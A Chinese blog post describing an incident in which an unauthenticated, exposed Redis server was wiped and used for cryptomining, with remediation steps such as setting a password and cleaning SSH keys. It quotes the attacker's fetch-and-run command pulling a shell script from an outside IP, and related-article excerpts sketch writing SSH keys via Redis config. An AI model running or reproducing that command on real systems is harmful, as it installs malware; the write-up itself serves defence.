记一次因redis未授权访问漏洞被攻击进行挖矿

最新推荐文章于 2024-05-15 11:40:15 发布
最新推荐文章于 2024-05-15 11:40:15 发布
阅读量907 收藏 1
点赞数 1
分类专栏: 运维 文章标签: redis linux 漏洞 挖矿
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/y523006369/article/details/103407621
版权
一、问题描述

redis存储的业务数据被清空,且被注入未知的url下载链接:

cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh

百度该链接后,发现是这是一段带有恶意链接脚本,进行恶意shell脚本下载,从而实现远程代码攻击,并进行挖矿行为。

二、分析

分析参考链接:

https://www.freebuf.com/column/211777.html

攻击者利用redis 漏洞,通常设置包含命令以下载外部远程资源并运行它的值。比较流行的命令是添加SSH密钥,因此攻击者还可以远程访问机器并接管它,替换系统命令文件等,利用进行挖矿。

利用redis未授权漏洞入侵的一些必要的条件:

(1)需要开放的redis服务对外开放.Redis的密码不能过于复杂,或者没有密码;

(2) redis服务最好是以root用户运行,破坏力更强;

redis未授权访问漏洞的危害

(1).redis里保存的数据泄露

(2). 被提权后控制整个主机

三、解决

1、清空 crontab 未知的计划任务。(本案未安装crontab)
2、设置 redis 端口权限和账号密码
本案未设置密码,因此进行密码设置,在配置文件设置requirepass *****(密码)

3、清空未知的 ssh key

cd  /root/.ssh

打开 authorized_keys ,检查是否有可疑项
打开known_hosts 文件,检查是否有可疑项
/root/.ssh目录下是否有可疑的文件

本案中,authorized_keys 存在可疑项,进行清空,/root/.ssh目录下 存在可疑文件root,进行删除

结果待观察。。。

更多

yaomj1986
关注
专栏目录
由于redis暴露外网设置密码被挖矿问题处理
ZhengXinMing1998的博客
05-24 918
一、问题查找 接到腾讯云短信提醒,服务器可能被植入了挖矿程序。 1.于是top查看cpu占用,发现一个名为java8_8的程序会定时隔一段时间就占用系统特别高的cpu 2.检查系统中的定时任务 发现/etc/crontab文件中出现了可疑的定时任务,通过ip查找发现ip地址来自美国 3.检查系统启动项,发现启动项中确有java8_8-server,并且状态位enable的 二、问题处理 1.清除系统该进行的启动项:systemctl disable 服务名 2.查看进程的存储目录,rm -rf /
Redis授权访问漏洞
m0_57379855的博客
03-07 991
Redis授权访问漏洞Redis常用的数据类型Redis安装下载Redis解压压缩包安装 gcc 依赖编译安装修改配置文件使用指定配置文件启动 Redis进入客户端停止 redis(在客户端中)配置别名的步骤Redis常见用途keys *flushallsetgethset hashhget hashRedis服务端配置Redis客户端配置Redis持久机制Redis动态修改配置webshell提权反弹连接netcatmsfsocatRedis写入反弹链接crontabSSH key免密登录Redis加固
云服务器上Redis数据库被攻击实录+总结
最新发布
青衫客36的博客
05-15 1268
通过以上步骤,可以详细了解攻击过程,并采取有效的措施防止类似攻击的发生。增强 Redis 服务器和系统的安全性是关键,确保只有受信任的用户能够访问和管理服务器。计划任务格式:计划任务的格式是一个定时器表达式后跟执行命令。这条任务每 15 分钟执行一次curl命令下载并执行远程脚本。文件路径:攻击者将 Redis 配置为将数据持久化到cron计划任务目录,如。这导致持久化的内容成为cron守护进程的一部分计划任务。持久化机制的滥用:通过 Redis 的SAVE。
攻击者利用Redis授权访问漏洞进行新型入侵挖矿的事件分析
浪丶荡
09-30 1103
攻击者利用Redis授权访问漏洞进行新型入侵挖矿的事件分析 昨天我在博客中分享了自己服务器被攻击的一段病毒脚本——【谁干的】,安全方面不是很专业,只看懂了个大概,对着脚本将那些自动任务一一删除了,禁用了Redis对外开放,及时加了密码才使服务器能正常运转,上次的勒索病毒让我躲过了一劫,没想到这次因为自己的一时疏忽,竟然在第一时间就中招了……看看专业人士的分析吧 攻击者利用Redis授权访问漏洞...
排查通过服务器中 redis漏洞植入 pnscan 病毒进行挖矿
pkyShare 的博客
05-17 872
1 描述   最近买了一台云服务器进行学习研究,然后装了 redis,怎想到了某天晚上 22:00 开始服务器就卡顿了,输入命令半天没响应,然后重新连接则多次超时。最后连接上去了,输入命令 uptime ,显示如下图:   我的服务器是 1 核心的,信息显示有另一个用户,而且后面三个参数都超过了 1,表示当前 CPU 严重过载。   再在云服务器管理页面查看可视化界面,如下图:   没遇到过这种情况,然后就提交了工单叫云服务器人员帮忙处理。 2 结果与分析   结果是攻击者通过 redis 的安全漏洞植入
阿里云服务器被Redis弱密码漏洞挖矿
清风思雨的博客
08-11 419
重启了三次,没办法,最后是通过重装了系统才解决的,就短短的半个小时,就被渗透,这速度。总之损失了很多文件,配置,数据库也没有被及时备份,唉,之前被SSH远程攻击上万次都没被打,被redis漏洞半个小时沦陷,长个性,以后注意!我尝试了网上的极多的解决方案,但是都没用了,这些黑客的手段也是不断更新迭代。定时任务我也改了,删了,再到病毒文件清空了,但是都无所事事,进程杀不死,CPU长时间100%。...
一次因为redis漏洞挖矿
啊鹏的博客
10-01 2834
问题:CPU一直100%,top看不到进程,无从下手,阿里云无限报异常文件下载,以及linux共享库预加载配置文件被篡改。 经百度,到解决办法: 参考文档:https://blog.csdn.net/leisure_life/article/details/82899703 https://blog.csdn.net/leisure_life/article/details/82905256...
Redis3授权访问漏洞导致服务器被入侵
数据之路
06-06 4958
Redis授权访问漏洞
redis授权访问漏洞
ad12456的博客
05-12 2925
漏洞场景: Redis 4.x/5.x 授权访问漏洞: 因配置不当可以授权访问攻击者无需认证就可以访问到内部数据,其漏洞可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据,攻击者还可通过 EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接免密码登录服务器。 还能被利用去挖矿。 Redias: Redis的常见数据类型: ①: String:字符和整型。 缓存、分布式session、分布式锁、全局ID
一次Redis授权访问漏洞入侵分析
java060515的专栏
11-26 1771
0x00 简介 通过之前部署的蜜罐系统,我近日在滴滴云上捕获到了一个通过 Redis 授权访问漏洞进行入侵的蠕虫样本,该样本的特点是使用 Python 脚本进行横向漏洞扫描,并且具有进程隐藏和卸载某些云上安全产品的功能。 0x01 样本分析 通过蜜罐日志得到攻击者入侵开始于通过 Redis 写 crontab: 命令中的 URL https://pastebin.com/raw/1NtRkBc...
redis授权
weixin_47224111的博客
10-16 2883
0X01redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set()、zset(sorted set –有序)和hash(哈希类型)。 redis很大程度补偿了memcached这类key/value存储的不足,在部分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户
Redis授权漏洞复现,利用其实现的挖矿蠕虫脚本分析
qq_53689523的博客
05-05 881
Redis授权漏洞复现 挖矿蠕虫脚本分析 恶意代码分析实例
解决redislinux(centos)下的一个挖矿漏洞
qq_34870166的博客
01-24 5641
redis挖矿漏洞
CPU被挖矿Redis竟是内鬼。
JavaMBa的博客
11-17 847
作者:轩辕之风 原文链接:https://www.cnblogs.com/xuanyuan/p/15564302.html 却说这一日,Redis正如往常一般工作,不久便收到了一条SAVE命令。 虽说这Redis常被用来当做缓存,数据只存在于内存中,却也能通过SAVE命令将内存中的数据保存到磁盘文件中以便持久化存储。 只见Redis刚打开文件,准备写入,不知何处突然冲出几个大汉将其擒住。 到底是怎么回事?Redis一脸懵。 这事还得要从一个月之前说起。 挖矿病毒 前情回顾:C..
一次阿里云服务器因Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案
ZL_1618的博客
12-27 1205
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)①1000+CTF历届题库(主流和经典的应该都有了)③项目源码(四五十个有趣且经典的练手项目及源码)⑦ 2023密码学/隐身术/PWN技术手册大全。⑤ 网络安全学习路线图(告别不入流的学习)⑥ CTF/渗透测试工具镜像文件大全。②CTF技术文档(最全中文版)
CPU被挖矿Redis竟是内鬼
m0_67900727的博客
03-17 201
却说这一日,Redis正如往常一般工作,不久便收到了一条SAVE命令。 虽说这Redis常被用来当做缓存,数据只存在于内存中,却也能通过SAVE命令将内存中的数据保存到磁盘文件中以便持久化存储。 图片 只见Redis刚打开文件,准备写入,不知何处突然冲出几个大汉将其擒住。 到底是怎么回事?Redis一脸懵。 这事还得要从一个月之前说起。 挖矿病毒 前情回顾:CPU深夜狂飙,一帮大佬都傻眼了··· 一个月前,突如其来的警报声打破了Linux帝国夜晚的宁静,CPU占用率突然飙升,却不知
redis设置密码被植入挖矿脚本
QQ657205470的博客
03-06 1343
无意间发现启动redis的时候cpu瞬间拉到了100%,主要就是zzh和newinit.sh两个脚本。百度了一下说是被植入了挖矿脚本,是因为redis没有设置密码。参考着搜到的博客处理了问题,但是系统好多命令和配置都被破坏了,还是有必要重装。删除 ia 参数 :chattr -ia zzh ,提示没有权限。然后再回到 etc 目录下,执行 chattr -ia zzh。再执行 cat /etc/crontab ,发现有一条定时任务。在网上搜索 zzh,发现 zzh 是一种挖矿脚本。删除定时任务和这个脚本。
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1461
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
服务器遭黑客入侵,被当作挖矿机器
QIANDXX的博客
02-08 594
完了,被黑了!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值